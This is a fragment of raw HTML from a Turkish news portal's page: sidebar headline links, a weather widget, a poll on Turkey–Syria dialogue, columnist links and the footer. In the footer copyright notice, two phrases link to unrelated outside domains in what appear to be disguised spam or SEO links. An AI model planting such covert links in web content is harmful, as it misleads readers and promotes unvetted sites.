      <img alt="Fransa&#039;nın en büyük işçi sendikası grev başlattı" class="img-fluid align-self-center lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png" data-src="https://www.dunyabulteni.net/images/resize/100/135x87/haberler/thumbs/2022/11/fransa_nin_en_buyuk_isci_sendikasi_grev_baslatti_h545826_e18d8.jpg">
    </a>
    <div class="media-body align-self-center p-2">
      <h6>
        <a href="https://www.dunyabulteni.net/avrupa/fransa-nin-en-buyuk-isci-sendikasi-grev-baslatti-h545826.html" title="Fransa&#039;nın en büyük işçi sendikası grev başlattı" target="_blank">
          Fransa&#039;nın en büyük işçi sendikası grev başlattı        </a>
      </h6>
    </div>
  </div>
    <div class="media bg-white shadow-sm mb-2">
    <a href="https://www.dunyabulteni.net/avrupa/isvec-disisleri-bakani-billstrom-kristerssonun-ankara-ziyareti-diyalog-icin-alan-oldugunu-gosterdi-h545825.html" title="İsveç Dışişleri Bakanı Billström: Kristersson&#39;un Ankara ziyareti diyalog için alan olduğunu gösterdi" target="_blank">
      <img alt="İsveç Dışişleri Bakanı Billström: Kristersson&#39;un Ankara ziyareti diyalog için alan olduğunu gösterdi" class="img-fluid align-self-center lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png" data-src="https://www.dunyabulteni.net/images/resize/100/135x87/haberler/thumbs/2022/11/isvec_disisleri_bakani_billstrom_kristersson_un_ankara_ziyareti_diyalog_icin_alan_oldugunu_gosterdi_h545825_1a81a.jpg">
    </a>
    <div class="media-body align-self-center p-2">
      <h6>
        <a href="https://www.dunyabulteni.net/avrupa/isvec-disisleri-bakani-billstrom-kristerssonun-ankara-ziyareti-diyalog-icin-alan-oldugunu-gosterdi-h545825.html" title="İsveç Dışişleri Bakanı Billström: Kristersson&#39;un Ankara ziyareti diyalog için alan olduğunu gösterdi" target="_blank">
          İsveç Dışişleri Bakanı Billström: Kristersson&#39;un Ankara ziyareti diyalog için alan olduğunu gösterdi        </a>
      </h6>
    </div>
  </div>
    <div class="media bg-white shadow-sm mb-2">
    <a href="https://www.dunyabulteni.net/avrupa/norvec-savunma-universitesi-teror-uzmani-ranstorp-isvec-30-yildir-teroristler-icin-bir-siginak-h545823.html" title="Norveç Savunma Üniversitesi Terör Uzmanı Ranstorp: İsveç, 30 yıldır teröristler için bir sığınak" target="_blank">
      <img alt="Norveç Savunma Üniversitesi Terör Uzmanı Ranstorp: İsveç, 30 yıldır teröristler için bir sığınak" class="img-fluid align-self-center lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png" data-src="https://www.dunyabulteni.net/images/resize/100/135x87/haberler/thumbs/2022/11/norvec_savunma_universitesi_teror_uzmani_ranstorp_isvec_30_yildir_teroristler_icin_bir_siginak_h545823_426ba.jpg">
    </a>
    <div class="media-body align-self-center p-2">
      <h6>
        <a href="https://www.dunyabulteni.net/avrupa/norvec-savunma-universitesi-teror-uzmani-ranstorp-isvec-30-yildir-teroristler-icin-bir-siginak-h545823.html" title="Norveç Savunma Üniversitesi Terör Uzmanı Ranstorp: İsveç, 30 yıldır teröristler için bir sığınak" target="_blank">
          Norveç Savunma Üniversitesi Terör Uzmanı Ranstorp: İsveç, 30 yıldır teröristler için bir sığınak        </a>
      </h6>
    </div>
  </div>
    <div class="media bg-white shadow-sm mb-2">
    <a href="https://www.dunyabulteni.net/avrupa/stoltenberg-nato-muttefiklerini-siber-guvenlik-icin-daha-fazla-yatirima-h545820.html" title="Stoltenberg, NATO müttefiklerini siber güvenlik için daha fazla yatırıma davet etti" target="_blank">
      <img alt="Stoltenberg, NATO müttefiklerini siber güvenlik için daha fazla yatırıma davet etti" class="img-fluid align-self-center lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png" data-src="https://www.dunyabulteni.net/images/resize/100/135x87/haberler/thumbs/2022/11/stoltenberg_nato_muttefiklerini_siber_guvenlik_icin_daha_fazla_yatirima_davet_etti_h545820_ca669.png">
    </a>
    <div class="media-body align-self-center p-2">
      <h6>
        <a href="https://www.dunyabulteni.net/avrupa/stoltenberg-nato-muttefiklerini-siber-guvenlik-icin-daha-fazla-yatirima-h545820.html" title="Stoltenberg, NATO müttefiklerini siber güvenlik için daha fazla yatırıma davet etti" target="_blank">
          Stoltenberg, NATO müttefiklerini siber güvenlik için daha fazla yatırıma davet etti        </a>
      </h6>
    </div>
  </div>
    <div class="media bg-white shadow-sm">
    <a href="https://www.dunyabulteni.net/avrupa/tasarruflar-savunma-harcamalarini-etkilemeyecek-h545808.html" title="&quot;Tasarruflar savunma harcamalarını etkilemeyecek&quot;" target="_blank">
      <img alt="&quot;Tasarruflar savunma harcamalarını etkilemeyecek&quot;" class="img-fluid align-self-center lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png" data-src="https://www.dunyabulteni.net/images/resize/100/135x87/haberler/thumbs/2022/11/tasarruflar_savunma_harcamalarini_etkilemeyecek_h545808_f8da2.jpg">
    </a>
    <div class="media-body align-self-center p-2">
      <h6>
        <a href="https://www.dunyabulteni.net/avrupa/tasarruflar-savunma-harcamalarini-etkilemeyecek-h545808.html" title="&quot;Tasarruflar savunma harcamalarını etkilemeyecek&quot;" target="_blank">
          &quot;Tasarruflar savunma harcamalarını etkilemeyecek&quot;        </a>
      </h6>
    </div>
  </div>
  </div>
<!-- HAVA DURUMU -->
<div id="weather-widget" class="mb-3">
  <div class="card shadow-sm bg-info">
    <div class="card-body">
      <div class="row">
        <div class="col-6 weather-degree text-light" data-name="weather-degree">
          <i class="wi wi-day-sunny text-warning"></i> 17        </div>
        <div class="col-6 weather-city pt-3">
          <div class="form-group text-center">
            <select data-name="weather-select" class="mb-1">
                              <option value="TUXX0061" >Adana</option>
                              <option value="9267066" >Adıyaman</option>
                              <option value="TUXX0046" >Afyon</option>
                              <option value="771" >Ağrı</option>
                              <option value="901" >Aksaray</option>
                              <option value="1412" >Amasya</option>
                              <option value="TUXX0002" >Ankara</option>
                              <option value="TUXX0004" >Antalya</option>
                              <option value="1885" >Ardahan</option>
                              <option value="9264197" >Artvin</option>
                              <option value="TUXX0051" >Aydın</option>
                              <option value="TUXX0041" >Balıkesir</option>
                              <option value="3037" >Bartın</option>
                              <option value="9261679" >Batman</option>
                              <option value="3200" >Bayburt</option>
                              <option value="3946" >Bilecik</option>
                              <option value="9260548" >Bingöl</option>
                              <option value="4045" >Bitlis</option>
                              <option value="TUXX0032" >Bolu</option>
                              <option value="5249" >Burdur</option>
                              <option value="TUXX0039" >Bursa</option>
                              <option value="TUXX0037" >Çanakkale</option>
                              <option value="9258078" >Çankırı</option>
                              <option value="TUXX0033" >Çorum</option>
                              <option value="8899" >Denizli</option>
                              <option value="TUXX0010" >Diyarbakır</option>
                              <option value="9252670" >Düzce</option>
                              <option value="TUXX0030" >Edirne</option>
                              <option value="TUXX0049" >Elazığ</option>
                              <option value="TUXX0035" >Erzincan</option>
                              <option value="TUXX0013" >Erzurum</option>
                              <option value="TUXX0040" >Eskişehir</option>
                              <option value="TUXX0055" >Gaziantep</option>
                              <option value="12125" >Giresun</option>
                              <option value="9248871" >Gümüşhane</option>
                              <option value="9255950" >Hakkari</option>
                              <option value="1694" >Hatay</option>
                              <option value="9245907" >Iğdır</option>
                              <option value="TUXX0052" >Isparta</option>
                              <option value="TUXX0014" selected>İstanbul</option>
                              <option value="TUXX0015" >İzmir</option>
                              <option value="15888" >K. Maraş</option>
                              <option value="9243604" >Karabük</option>
                              <option value="16174" >Karaman</option>
                              <option value="743952" >Kars</option>
                              <option value="16274" >Kastamonu</option>
                              <option value="16345" >Kayseri</option>
                              <option value="TUXX0019" >Kırıkkale</option>
                              <option value="16847" >Kırklareli</option>
                              <option value="TUXX0042" >Kırşehir</option>
                              <option value="16700" >Kilis</option>
                              <option value="TUXX0017" >Kocaeli</option>
                              <option value="TUXX0053" >Konya</option>
                              <option value="17542" >Kütahya</option>
                              <option value="19917" >Malatya</option>
                              <option value="20103" >Manisa</option>
                              <option value="20271" >Mardin</option>
                              <option value="14693" >Mersin</option>
                              <option value="TUXX0057" >Muğla</option>
                              <option value="TUXX0062" >Muş</option>
                              <option value="TUXX0065" >Nevşehir</option>
                              <option value="23341" >Niğde</option>
                              <option value="24553" >Ordu</option>
                              <option value="24703" >Osmaniye</option>
                              <option value="27911" >Rize</option>
                              <option value="TUXX0022" >Sakarya</option>
                              <option value="TUXX0023" >Samsun</option>
                              <option value="TUXX0050" >Siirt</option>
                              <option value="30965" >Sinop</option>
                              <option value="TUXX0034" >Sivas</option>
                              <option value="34552" >Şanlıurfa</option>
                              <option value="10034630" >Şırnak</option>
                              <option value="TUXX0031" >Tekirdağ</option>
                              <option value="33558" >Tokat</option>
                              <option value="TUXX0029" >Trabzon</option>
                              <option value="9226242" >Tunceli</option>
                              <option value="TUXX0045" >Uşak</option>
                              <option value="TUXX0043" >Van</option>
                              <option value="9250659" >Yalova</option>
                              <option value="37318" >Yozgat</option>
                              <option value="TUXX0028" >Zonguldak</option>
                              <option value="10208812" >Kıbrıs</option>
                              <option value="10700" >Famagusta</option>
                              <option value="23317" >Girne</option>
                              <option value="7261129" >Güzelyurt</option>
                              <option value="23317" >Lefkoşa</option>
                          </select>
          </div>
        </div>
        <div class="col-12">
          <div class="btn btn-outline-light btn-block text-uppercase text-center font-weight-light disabled" data-name="weather-desc">açık</div>
        </div>
      </div>
    </div>
  </div>
</div>
<!-- ANKET -->
<div id="survey" class="mb-3" data-survey="3">
  <div class="card shadow-sm">
    <div class="card-header bg-white">
      <span class="first-word widget-title text-info text-uppercase">Günün Anketi</span>
      <a class="btn btn-default btn-sm float-right text-uppercase" href="https://www.dunyabulteni.net/anketler.html" title="Anketler" target="_blank">
        Tümü      </a>
    </div>
    <div class="card-body">
            <h5 class="card-title">Türkiye Esed rejimiyle diyalog kurmalı mı?</h5>
              <div class="survey-options">
          <form id="survey_form_3">
            <input type="hidden" name="aid" value="3">
                          <div class="form-check m-1">
                <input class="form-check-input" type="radio" name="OY3" id="survey-option-3-6" value="6">
                <label class="form-check-label" for="survey-option-3-6">
                  Evet                </label>
              </div>
                          <div class="form-check m-1">
                <input class="form-check-input" type="radio" name="OY3" id="survey-option-3-7" value="7">
                <label class="form-check-label" for="survey-option-3-7">
                  Hayır                </label>
              </div>
                          <div class="form-check m-1">
                <input class="form-check-input" type="radio" name="OY3" id="survey-option-3-8" value="8">
                <label class="form-check-label" for="survey-option-3-8">
                  Asla                </label>
              </div>
                      </form>
          <small class="alert alert-warning mt-2" style="display:none;margin-bottom:0">Oy kullanmak için bir seçeneği işaretleyin!</small>
          <small class="alert alert-danger mt-2" style="display:none;margin-bottom:0">Bu anket için daha önce oy kullandınız!</small>
          <div class="alert alert-success mt-2" style="display:none;margin-bottom:0">Başarılı bir şekilde oyunuzu kullandınız.</div>
          <div class="col-auto mt-3">
            <button type="button" data-id="3" data-results="1" class="btn btn-success vote text-uppercase">Oy Kullan</button>
                          <button class="btn btn-warning text-uppercase results float-right" type="button" data-id="3">Sonuçlar</button>
                      </div>
        </div>
          </div>
  </div>
</div>
<!-- YAZARLAR -->
<div id="authors-sidebar" class="mb-3">
  <div class="card shadow-sm">
    <div class="card-header bg-white">
      <span class="first-word widget-title text-info text-uppercase">Köşe Yazarlarımız</span>
      <a class="btn btn-default btn-sm float-right text-uppercase" href="https://www.dunyabulteni.net/yazarlar" title="Köşe Yazarlarımız" target="_blank">Tümü</a>
    </div>
    <div class="card-body">
            <div class="media mb-2 pb-2 border-bottom">
        <a href="https://www.dunyabulteni.net/profil/2365/ahmet-akalin" title="Ahmet Akalın" target="_blank">
          <img alt="Ahmet Akalın" class="img-fluid align-self-center mr-3 rounded lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png" data-src="https://www.dunyabulteni.net/images/resize/100/75x75/yazarlar/advsdvsdvdsvd_1_1.jpg">
        </a>
        <div class="media-body align-self-center">
          <a class="text-info font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/profil/2365/ahmet-akalin" title="Ahmet Akalın" target="_blank">
            Ahmet Akalın          </a>
          <h6>
            <a href="https://www.dunyabulteni.net/1-uluslararasi-ahiskali-turk-kadinlari-sempozyumu-makale,21580.html" title="1. Uluslararası Ahıskalı Türk Kadınları Sempozyumu" target="_blank">
              1. Uluslararası Ahıskalı Türk Kadınları Sempozyumu            </a>
          </h6>
        </div>
      </div>
            <div class="media mb-2 pb-2 border-bottom">
        <a href="https://www.dunyabulteni.net/profil/2339/osman-sahin" title="Osman Şahin" target="_blank">
          <img alt="Osman Şahin" class="img-fluid align-self-center mr-3 rounded lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png" data-src="https://www.dunyabulteni.net/images/resize/100/75x75/yazarlar/advsdvsdvdsvd_1.jpg">
        </a>
        <div class="media-body align-self-center">
          <a class="text-info font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/profil/2339/osman-sahin" title="Osman Şahin" target="_blank">
            Osman Şahin          </a>
          <h6>
            <a href="https://www.dunyabulteni.net/dere-yataklarina-ev-yapilmasi-caiz-mi-makale,21569.html" title="Dere yataklarına ev yapılması caiz mi?" target="_blank">
              Dere yataklarına ev yapılması caiz mi?            </a>
          </h6>
        </div>
      </div>
            <div class="media mb-2 pb-2 border-bottom">
        <a href="https://www.dunyabulteni.net/profil/2367/kamal-ilhamoglu-salimov" title="Kamal İlhamoğlu Salimov" target="_blank">
          <img alt="Kamal İlhamoğlu Salimov" class="img-fluid align-self-center mr-3 rounded lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png" data-src="https://www.dunyabulteni.net/images/resize/100/75x75/yazarlar/WhatsApp-Image-2022-05-15-at-17.16.43.jpeg">
        </a>
        <div class="media-body align-self-center">
          <a class="text-info font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/profil/2367/kamal-ilhamoglu-salimov" title="Kamal İlhamoğlu Salimov" target="_blank">
            Kamal İlhamoğlu Salimov          </a>
          <h6>
            <a href="https://www.dunyabulteni.net/cografyamiz-adina-daha-cok-konusacaklarimiz-var-makale,21563.html" title="Coğrafyamız adına daha çok konuşacaklarımız var…" target="_blank">
              Coğrafyamız adına daha çok konuşacaklarımız var…            </a>
          </h6>
        </div>
      </div>
            <div class="media mb-2 pb-2 border-bottom">
        <a href="https://www.dunyabulteni.net/profil/3195/rahmatullah-rasoly" title="Rahmatullah Rasoly" target="_blank">
          <img alt="Rahmatullah Rasoly" class="img-fluid align-self-center mr-3 rounded lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png" data-src="https://www.dunyabulteni.net/images/resize/100/75x75/yazarlar/wHT7ZM7Z_400x400.jpg">
        </a>
        <div class="media-body align-self-center">
          <a class="text-info font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/profil/3195/rahmatullah-rasoly" title="Rahmatullah Rasoly" target="_blank">
            Rahmatullah Rasoly          </a>
          <h6>
            <a href="https://www.dunyabulteni.net/afganistanin-manevi-sermayesinin-kaybi-makale,21547.html" title="Afganistan’ın manevi sermayesinin kaybı" target="_blank">
              Afganistan’ın manevi sermayesinin kaybı            </a>
          </h6>
        </div>
      </div>
            <div class="media mb-2 pb-2 border-bottom">
        <a href="https://www.dunyabulteni.net/profil/2348/mehmet-ozay" title="Mehmet Özay" target="_blank">
          <img alt="Mehmet Özay" class="img-fluid align-self-center mr-3 rounded lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png" data-src="https://www.dunyabulteni.net/images/resize/100/75x75/yazarlar/advdaadvdvdav.jpg">
        </a>
        <div class="media-body align-self-center">
          <a class="text-info font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/profil/2348/mehmet-ozay" title="Mehmet Özay" target="_blank">
            Mehmet Özay          </a>
          <h6>
            <a href="https://www.dunyabulteni.net/guney-korede-covid-19-surecinde-parlamento-secimleri-ve-sonuclarina-dair-makale,21449.html" title="Güney Kore’de Covid-19 sürecinde parlamento seçimleri ve sonuçlarına dair" target="_blank">
              Güney Kore’de Covid-19 sürecinde parlamento seçimleri ve sonuçlarına dair            </a>
          </h6>
        </div>
      </div>
            <div class="media">
        <a href="https://www.dunyabulteni.net/profil/2349/burak-caliskan" title="Burak Çalışkan" target="_blank">
          <img alt="Burak Çalışkan" class="img-fluid align-self-center mr-3 rounded lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png" data-src="https://www.dunyabulteni.net/images/resize/100/75x75/yazarlar/advsdvsdvdsvd.jpg">
        </a>
        <div class="media-body align-self-center">
          <a class="text-info font-weight-bold text-uppercase" href="https://www.dunyabulteni.net/profil/2349/burak-caliskan" title="Burak Çalışkan" target="_blank">
            Burak Çalışkan          </a>
          <h6>
            <a href="https://www.dunyabulteni.net/vladimir-putin-donemi-rus-dis-politikasinin-donusumu-makale,21446.html" title="Vladimir Putin Dönemi Rus Dış Politikasının Dönüşümü" target="_blank">
              Vladimir Putin Dönemi Rus Dış Politikasının Dönüşümü            </a>
          </h6>
        </div>
      </div>
          </div>
  </div>
</div>
<!-- SAYFALAR -->
<div id="similar-news" class="mb-3">
  <div class="card shadow-sm">
    <div class="card-header bg-white">
      <span class="first-word widget-title text-info text-uppercase">Sayfalar</span>
      <a class="btn btn-default btn-sm float-right text-uppercase" href="https://www.dunyabulteni.net/sayfalar.html" title="Sayfalar" target="_blank">Tümü</a>
    </div>
    <div class="card-body">
            <div class="media bg-white shadow-sm mb-2">
        <div class="media-body align-self-center p-2">
          <h6>
            <a href="https://www.dunyabulteni.net/gizlilik-ve-kisisel-verilerin-korunmasi-politikasi-s2.html" title="GİZLİLİK VE KİŞİSEL VERİLERİN KORUNMASI POLİTİKASI" target="_blank">
              <i class="far fa-file-alt"></i> GİZLİLİK VE KİŞİSEL VERİLERİN KORUNMASI POLİTİKASI            </a>
          </h6>
        </div>
      </div>
            <div class="media bg-white shadow-sm mb-2">
        <div class="media-body align-self-center p-2">
          <h6>
            <a href="https://www.dunyabulteni.net/kullanim-kosullari-s3.html" title="KULLANIM KOŞULLARI" target="_blank">
              <i class="far fa-file-alt"></i> KULLANIM KOŞULLARI            </a>
          </h6>
        </div>
      </div>
            <div class="media bg-white shadow-sm mb-2">
        <div class="media-body align-self-center p-2">
          <h6>
            <a href="https://www.dunyabulteni.net/kisisel-verilerin-korunmasi-ve-islenmesi-hakkinda-aydinlatma-metni-s4.html" title="Kişisel Verilerin Korunması ve İşlenmesi Hakkında Aydınlatma Metni" target="_blank">
              <i class="far fa-file-alt"></i> Kişisel Verilerin Korunması ve İşlenmesi Hakkında Aydınlatma Metni            </a>
          </h6>
        </div>
      </div>
            <div class="media bg-white shadow-sm">
        <div class="media-body align-self-center p-2">
          <h6>
            <a href="https://www.dunyabulteni.net/cerez-politikamiz-s5.html" title="ÇEREZ POLİTİKAMIZ" target="_blank">
              <i class="far fa-file-alt"></i> ÇEREZ POLİTİKAMIZ            </a>
          </h6>
        </div>
      </div>
          </div>
  </div>
</div>
                </div>
                <!-- Sidebar bitti -->
            </div>
        </div>
            </main>
    <a id="back-to-top" class="btn btn-lg btn-light border rounded-circle" href="#" title="Yukarı Git"><i
            class="fa fa-chevron-up"></i></a>
    <style>
    .short-description a {
        color:#6c757d;
    }
</style>
<div id="footer" class="py-5 bg-dark">
    <div class="container">
        <div class="row">
            <div class="col-4 text-secondary">
                <div class="mb-3">
                    <img src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png"
                        data-src="https://www.dunyabulteni.net/images/banner/dunyabulteni_1.png" alt="Dünya Bülteni Haber Portalı"
                        class="img-fluid lazyload">
                </div>
                                <div class="short-description">Bu sitede yayınlanan <a href="https://guncelgirisi.com">tüm materyalin</a> her hakkı mahfuzdur. <a href="https://guncelbonus.org">Kaynak gösterilmeden</a> alıntılanamaz.</div>
                                <div class="title-line my-3 bg-warning w-25"></div>
                                <div class="mt-2">
                    <i class="fas fa-map-marker-alt text-warning"> </i>Fetih Mahallesi, Tahralı Sokak, Kavakyeli A Blok, No:7 D:25, Ataşehir/İstanbul                </div>
                                                <div class="mt-2">
                    <i class="fas fa-phone text-warning"> </i>0216 339 45 45                </div>
                                                <div class="mt-2">
                    OKUR HATTI: 0552 324 3890                </div>
                                                <div class="mt-2">
                    <i class="far fa-envelope text-warning"> </i><a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="0861666e67486c7d6671696a7d647c6d666126666d7c">[email&#160;protected]</a>                </div>
                                <div class="mt-4">
                                        <a class="btn btn-light btn-sm" href="https://www.facebook.com/dunyabulteni"
                        target="_blank" title="Facebook"><i class="fab fa-facebook-f text-primary"></i> </a>
                                                            <a class="btn btn-light btn-sm" href="https://twitter.com/@dunyabulteni" target="_blank"
                        title="Twitter"><i class="fab fa-twitter text-info"></i> </a>
                                                                                                </div>
            </div>
            <div class="col-4">
  <h5 class="first-word text-white text-uppercase">Güncel Haberler</h5>
  <div class="title-line mt-2 mb-3 bg-warning w-25"></div>
    <div class="media mb-3">
    <img class="img-fluid lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png" data-src="https://www.dunyabulteni.net/images/resize/100/105x68/haberler/2022/11/almanya_da_resesyon_bekleniyor_h545829_2f565.JPG" alt="Almanya&#039;da resesyon bekleniyor" width="105">
    <div class="media-body p-3 align-self-center">
      <h6>
        <a href="https://www.dunyabulteni.net/avrupa/almanya-da-resesyon-bekleniyor-h545829.html" title="Almanya&#039;da resesyon bekleniyor" target="_blank" class="text-white-50">
          Almanya&#039;da resesyon bekleniyor        </a>
      </h6>
    </div>
  </div>
    <div class="media mb-3">
    <img class="img-fluid lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png" data-src="https://www.dunyabulteni.net/images/resize/100/105x68/haberler/2022/11/jacinda_ardern_in_disaridaki_popularitesi_iceride_yok_h545828_39bf6.jpg" alt="Jacinda Ardern&#039;in dışarıdaki popülaritesi içeride yok" width="105">
    <div class="media-body p-3 align-self-center">
      <h6>
        <a href="https://www.dunyabulteni.net/avustralya/jacinda-ardern-in-disaridaki-popularitesi-iceride-yok-h545828.html" title="Jacinda Ardern&#039;in dışarıdaki popülaritesi içeride yok" target="_blank" class="text-white-50">
          Jacinda Ardern&#039;in dışarıdaki popülaritesi içeride yok        </a>
      </h6>
    </div>
  </div>
    <div class="media mb-3">
    <img class="img-fluid lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png" data-src="https://www.dunyabulteni.net/images/resize/100/105x68/haberler/2022/11/israil_den_anastasiadis_e_onur_nisani_h545827_ade63.JPG" alt="İsrail&#039;den Anastasiadis&#039;e &quot;Onur Nişanı&quot;" width="105">
    <div class="media-body p-3 align-self-center">
      <h6>
        <a href="https://www.dunyabulteni.net/israil/israil-den-anastasiadis-e-onur-nisani-h545827.html" title="İsrail&#039;den Anastasiadis&#039;e &quot;Onur Nişanı&quot;" target="_blank" class="text-white-50">
          İsrail&#039;den Anastasiadis&#039;e &quot;Onur Nişanı&quot;        </a>
      </h6>
    </div>
  </div>
    <div class="media mb-3">
    <img class="img-fluid lazyload" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png" data-src="https://www.dunyabulteni.net/images/resize/100/105x68/haberler/2022/11/fransa_nin_en_buyuk_isci_sendikasi_grev_baslatti_h545826_e18d8.jpg" alt="Fransa&#039;nın en büyük işçi sendikası grev başlattı" width="105">
    <div class="media-body p-3 align-self-center">
      <h6>
        <a href="https://www.dunyabulteni.net/avrupa/fransa-nin-en-buyuk-isci-sendikasi-grev-baslatti-h545826.html" title="Fransa&#039;nın en büyük işçi sendikası grev başlattı" target="_blank" class="text-white-50">
          Fransa&#039;nın en büyük işçi sendikası grev başlattı        </a>
      </h6>
    </div>
  </div>
  </div>
                    </div>
        <div class="footer-tags text-center my-3">
      <a href="https://www.dunyabulteni.net/haberleri/k%C4%B1rg%C4%B1zistan" title="kırgızistan" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#kırgızistan</a>
      <a href="https://www.dunyabulteni.net/haberleri/3" title="3" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#3</a>
      <a href="https://www.dunyabulteni.net/haberleri/bask%C4%B1n" title="baskın" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#baskın</a>
      <a href="https://www.dunyabulteni.net/haberleri/msb" title="msb" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#msb</a>
      <a href="https://www.dunyabulteni.net/haberleri/Beyrut" title="Beyrut" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#Beyrut</a>
      <a href="https://www.dunyabulteni.net/haberleri/Bel%C3%A7ika" title="Belçika" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#Belçika</a>
      <a href="https://www.dunyabulteni.net/haberleri/15+Temmuz+darbe+giri%C5%9Fimi" title="15 Temmuz darbe girişimi" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#15 Temmuz darbe girişimi</a>
      <a href="https://www.dunyabulteni.net/haberleri/putin" title="putin" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#putin</a>
      <a href="https://www.dunyabulteni.net/haberleri/salg%C4%B1n" title="salgın" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#salgın</a>
      <a href="https://www.dunyabulteni.net/haberleri/h%C4%B1rvatistan" title="hırvatistan" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#hırvatistan</a>
      <a href="https://www.dunyabulteni.net/haberleri/Mursi" title="Mursi" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#Mursi</a>
      <a href="https://www.dunyabulteni.net/haberleri/a%C5%9F%C4%B1" title="aşı" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#aşı</a>
      <a href="https://www.dunyabulteni.net/haberleri/Mahmud+Abbas" title="Mahmud Abbas" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#Mahmud Abbas</a>
      <a href="https://www.dunyabulteni.net/haberleri/Missouri" title="Missouri" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#Missouri</a>
      <a href="https://www.dunyabulteni.net/haberleri/libya+eylem" title="libya eylem" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#libya eylem</a>
      <a href="https://www.dunyabulteni.net/haberleri/turizm" title="turizm" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#turizm</a>
      <a href="https://www.dunyabulteni.net/haberleri/Bank+Asya" title="Bank Asya" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#Bank Asya</a>
      <a href="https://www.dunyabulteni.net/haberleri/bar%C4%B1%C5%9F+p%C4%B1nar%C4%B1+harekat%C4%B1" title="barış pınarı harekatı" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#barış pınarı harekatı</a>
      <a href="https://www.dunyabulteni.net/haberleri/Danimarka" title="Danimarka" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#Danimarka</a>
      <a href="https://www.dunyabulteni.net/haberleri/Kovid-19" title="Kovid-19" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#Kovid-19</a>
  </div>
        <div class="text-center">
                        <a href="https://itunes.apple.com/tr/app/haber-sistemi/id1436304621" target="_blank" title="App Store">
                <img class="img-fluid lazyload rounded" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png"
                    data-src="https://www.dunyabulteni.net/_themes/hs-elegant/images/apple.png" alt="App Store" width="125">
            </a>
                                    <a href="https://play.google.com/store/apps/details?id=com.dunyabulteni.net" target="_blank" title="Google Play">
                <img class="img-fluid lazyload rounded" src="https://www.dunyabulteni.net/_themes/hs-elegant/images/space.png"
                    data-src="https://www.dunyabulteni.net/_themes/hs-elegant/images/google-play.png" alt="Google Play" width="125">
            </a>
                    </div>
    </div>
</div>
<div id="footer-copyright" class="bg-dark py-3">
  <div class="container text-white">
    <div class="row">
      <div class="col-auto">
        Copyright &copy;
        2022        <br/>Her hakkı saklıdır. Haber Yazılımı: <a href="https://www.tebilisim.com" title="haber yazılımı, haber scripti, haber sistemi" target="_blank" class="text-white">TE Bilişim</a>      </div>
      <div class="col text-right">

        <a class="text-white pl-2 ml-2" href="https://www.dunyabulteni.net/kullanim-kosullari-s3.html" target="_blank" title="Kullanım Koşulları">Kullanım Koşulları</a> |

                  <a class="text-white pl-2 ml-2 border-left" href="https://www.dunyabulteni.net/gizlilik-ve-kisisel-verilerin-korunmasi-politikasi-s2.html" target="_blank" title="Gizlilik Politikası">Gizlilik Politikası</a>
         |

        <a class="text-white pl-2 ml-2" href="https://www.dunyabulteni.net/kisisel-verilerin-korunmasi-ve-islenmesi-hakkinda-aydinlatma-metni-s4.html" target="_blank" title="Kişisel Verilerin Korunması ve İşlenmesi Hakkında Aydınlatma Metni">Kişisel Verilerin Korunması ve İşlenmesi Hakkında Aydınlatma Metni</a> |

        <a class="text-white pl-2 ml-2" href="https://www.dunyabulteni.net/cerez-politikamiz-s5.html" target="_blank" title="Çerez Politikamız">Çerez Politikamız</a> |

      
        <a class="text-white pl-2 ml-2" href="https://www.dunyabulteni.net/kunye.html" target="_blank" title="Künye">Künye</a>
        <a class="text-white pl-2 ml-2 border-left" href="https://www.dunyabulteni.net/iletisim.html" target="_blank" title="İletişim">İletişim</a>
        <a class="text-white pl-2 ml-2 border-left" target="_blank" href="https://www.dunyabulteni.net/rss/" target="_blank" title="RSS">RSS</a>
        <a class="text-white pl-2 ml-2 border-left" href="https://www.dunyabulteni.net/sitene-ekle.html" target="_blank" title="Sitene Ekle">Sitene Ekle</a>
      </div>
    </div>
  </div>
</div>
    <div id="search" class="position-fixed w-100 h-100">
  <div class="close">Kapat</div>
  <form action="https://www.dunyabulteni.net/" method="get" class="p-3 position-absolute">
    <h3 class="text-light pb-2">Sitede Ara</h3>
    <div class="form-row">
      <div class="col-10">
